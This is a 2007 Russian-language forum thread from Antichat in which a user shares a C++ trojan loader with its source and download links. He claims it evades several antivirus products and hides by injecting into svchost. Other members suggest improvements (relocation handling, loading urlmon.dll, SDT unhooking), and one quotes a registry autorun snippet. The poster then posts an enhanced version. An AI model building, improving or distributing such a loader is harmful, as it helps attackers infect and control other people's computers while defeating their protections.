Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Защита ОС: вирусы, антивирусы, файрволы. (https://forum.antichat.xyz/forumdisplay.php?f=80)
-   -   Loader от меня (https://forum.antichat.xyz/showthread.php?t=43201)

Ky3bMu4 27.06.2007 16:29

Loader от меня
 
Решил написать лоадер. Просто выдрал из bloodknife`а всё ненужное. :D
Так значит:
1)Вес не пакованый 4кб.
2)Каспер, нод, др.веб в ауте.
3)Инжект в svchost - фаеры молчат.

На С++. Правите конфиг и юзаете. Естесн с исходниками.

Внимание! Адептами програминга перед просмотром сороцев положить валидол под язык! ;)

http://lordofring.tushino.com/LOADER.rar
http://rapidshare.com/files/39634411/LOADER.rar.html
http://softz.ifolder.ru/2507458

_Great_ 27.06.2007 17:16

Ухх открываем сорсы и начинаем готовить мат :)

Constantine 27.06.2007 17:28

*Сердечный приступ*

_Great_ 27.06.2007 17:28

Ну фто ж, начнём =)
Метод инжекта не очень оригинальный. Но а вдруг выбранная тобой база уже занята? Тогда ведь песец ослику (С) =( Так что было бы неплохо добавить релоки и их обработку на всякий пожарный.
Насчет добавления в автозапуск - ну эээ я например комп неделями не перезагружаю.. имхо все же лучше запускать троя сразу. Хотя это на вкус и цвет.. но тогда придется подождать завершения скачивания через WaitForSingleObject на объекте созданного в другом процессе потока

Далее, а ты уверен, что URLMON.DLL окажется в адресном пространстве жертвы? Я - нет. Поэтому было бы неплохо вначало func() дописать LoadLibrary("urlmon.dll"); а то есть риск вылететь с Access Violation ;)

Ну а вообще кода там не очень много, про сотню строчек больше сказать, вообщем-то и нечего :)
Разве что стиль отвратительный =) Ну ладно )

Hellsp@wn 27.06.2007 18:01

инжекст в свхост? и какие фаеры молчат, "огласите весь список пожалуйста" (с)
называть вещи надо своимим именами, молчать будет, по-моему, тока
виндовый фаер))) и пара таких же "псевдо" фаеров...

Y.Dmitriy 27.06.2007 18:09

у мну НОД реагирует:) мож че то не так делаю... и согласен, что в хвост вставлять не стоит фаер по коннекту среагирует...
Цитата:

HKEY hKey;
RegCreateKeyEx(HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows\\CurrentVersion\\pol icies\\Explorer\\Run",
NULL,
"",
REG_OPTION_NON_VOLATILE,
KEY_SET_VALUE,
NULL,
&hKey,
NULL); //запуск процесса нас сильно запалит, поэтому просто запишем файлик в автозапуск.
угу а изменение реестра нод не палит да?...

Ky3bMu4 28.06.2007 15:00

Гы-гы svchost меняет реестр! Ужс! :D :D :D

Можно конечн добавить чистку sdt, но тогда вес будет не 4 , а 11кб.

_Great_ 28.06.2007 15:22

Цитата:

Можно конечн добавить чистку sdt, но тогда вес будет не 4 , а 11кб.
Смотря какой код возьмешь) Самый лучший вариант через нтсистемдебагконтрол, если достанешь, конечно)

Ky3bMu4 28.06.2007 15:25

Вот, критику учёл. Вес 11кб(непакованый), чистка sdt , др.веб уже в теме...
Заливать на разные файловики не стал - вес всего 7кб.

http://lordofring.tushino.com/LOADERv.1.1.rar

_Great_ 28.06.2007 15:45

Откуда взял такой кривой код восстановления Sdt ?)


Время: 10:41